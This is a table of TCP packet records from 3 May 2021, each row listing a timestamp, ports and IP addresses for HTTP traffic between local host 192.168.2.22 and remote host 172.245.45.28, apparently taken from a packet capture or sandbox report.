May 3, 2021 14:55:41.414040089 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:41.614855051 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:41.614895105 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:41.614908934 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:41.614927053 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:41.614944935 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:41.614962101 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:41.614979029 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:41.614993095 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:41.615005016 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:41.615010023 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:41.615027905 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:41.615032911 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:41.615046978 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:41.615046978 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:41.615066051 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:41.615067959 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:41.615081072 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:41.615084887 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:41.615098000 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:41.615106106 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:41.615114927 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:41.615124941 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:41.615139008 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:41.615143061 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:41.615155935 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:41.615163088 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:41.615175962 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:41.615180016 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:41.615191936 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:41.615197897 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:41.615207911 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:41.615215063 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:41.615226030 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:41.615231991 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:41.615241051 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:41.615252972 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:41.615261078 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:41.615272999 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:41.615289927 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:41.615293980 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:41.615305901 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:41.615307093 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:41.615320921 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:41.615324974 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:41.615335941 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:41.615341902 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:41.615350008 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:41.615360975 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:41.615374088 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:41.615377903 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:41.615386963 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:41.615398884 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:41.615410089 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:41.615423918 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:41.617367983 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:41.817167044 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:41.817202091 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:41.817219973 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:41.817238092 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:41.817250967 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:41.817264080 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:41.817281008 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:41.817298889 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:41.817315102 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:41.817331076 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:41.817342997 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:41.817348003 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:41.817368031 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:41.817404032 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:41.817421913 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:41.817428112 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:41.817439079 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:41.817451954 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:41.817465067 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:41.817478895 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:41.817478895 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:41.817497969 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:41.817513943 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:41.817527056 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:41.817527056 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:41.817539930 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:41.817553043 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:41.817564964 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:41.817574978 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:41.817578077 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:41.817591906 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:41.817616940 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:41.817661047 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:41.817703009 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:41.817769051 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:41.817905903 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:41.817924976 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:41.817939997 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:41.817960024 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:41.817980051 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:41.817987919 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:41.818001032 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:41.818017960 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:41.818022013 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:41.818037033 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:41.818053961 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:41.818063974 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:41.818070889 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:41.818089008 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:41.818105936 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:41.818105936 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:41.818125010 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:41.818144083 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:41.818152905 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:41.818161011 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:41.818178892 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:41.818190098 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:41.818195105 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:41.818212032 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:41.818228006 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:41.818232059 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:41.818245888 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:41.818265915 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:41.818270922 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:41.818312883 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:41.820810080 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.017764091 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.017796993 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.017811060 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.017822981 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.017838955 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.017851114 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.017869949 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.017882109 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.018018961 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.018065929 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.020996094 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.021015882 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.021029949 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.021050930 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.021068096 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.021087885 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.021095037 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.021110058 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.021115065 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.021128893 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.021138906 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.021147013 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.021164894 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.021168947 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.021183014 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.021190882 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.021200895 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.021214008 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.021223068 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.021239042 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.021245003 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.021260023 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.021265030 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.021282911 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.021285057 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.021303892 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.021306038 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.021322012 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.021330118 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.021341085 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.021349907 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.021358967 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.021375895 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.021377087 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.021399021 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.021410942 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.021420002 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.021434069 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.021451950 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.021452904 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.021471977 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.021472931 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.021487951 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.021495104 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.021505117 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.021516085 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.021522045 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.021538973 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.021542072 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.021555901 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.021564007 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.021575928 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.021589041 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.021594048 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.021610975 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.021612883 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.021626949 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.021634102 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.021644115 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.021660089 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.021666050 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.021676064 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.021686077 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.021694899 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.021709919 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.021714926 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.021733999 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.021780968 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.021787882 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.021790028 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.023833036 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.218235970 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.218264103 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.218276978 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.218295097 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.218311071 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.218327045 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.218477964 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.218502998 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.219443083 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.219465971 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.219527006 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.223735094 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.223762989 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.223779917 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.223798037 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.223814011 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.223831892 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.223849058 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.223848104 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.223869085 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.223872900 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.223889112 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.223906040 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.223915100 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.223923922 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.223941088 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.223948002 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.223958969 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.223975897 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.223982096 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.223994017 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.224010944 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.224014044 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.224034071 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.224037886 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.224050999 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.224069118 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.224071026 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.224085093 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.224102020 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.224102974 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.224119902 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.224128008 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.224136114 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.224158049 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.224158049 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.224176884 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.224190950 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.224195957 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.224214077 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.224220991 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.224231958 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.224250078 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.224250078 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.224267006 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.224278927 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.224283934 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.224304914 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.224308968 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.224323034 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.224339008 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.224339962 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.224354982 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.224371910 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.224373102 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.224389076 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.224397898 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.224406004 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.224422932 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.224426985 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.224443913 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.224462032 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.224493027 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.226434946 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.423815966 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.423847914 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.423865080 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.423882961 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.423902035 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.423918009 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.423935890 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.423950911 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.423968077 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.423983097 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.423998117 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.424000978 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.424015045 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.424030066 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.424035072 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.424035072 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.424053907 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.424057961 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.424072027 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.424079895 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.424096107 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.424112082 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.424340963 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.424370050 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.424386978 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.424402952 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.424408913 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.424427032 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.424446106 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.424459934 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.424506903 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.424525976 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.424542904 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.424546003 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.424561024 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.424561977 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.424580097 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.424581051 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.424597979 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.424617052 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.424621105 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.424623966 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.424633026 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.424639940 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.424649954 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.424659014 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.424674988 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.424675941 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.424691916 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.424694061 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.424710989 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.424711943 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.424726009 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.424730062 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.424743891 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.424748898 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.424762011 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.424771070 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.424781084 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.424789906 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.424808025 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.424822092 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.424827099 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.424839973 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.424844027 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.424859047 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.424861908 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.424880028 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.424880028 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.424899101 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.424899101 CEST	49165	80	192.168.2.22	172.245.45.28
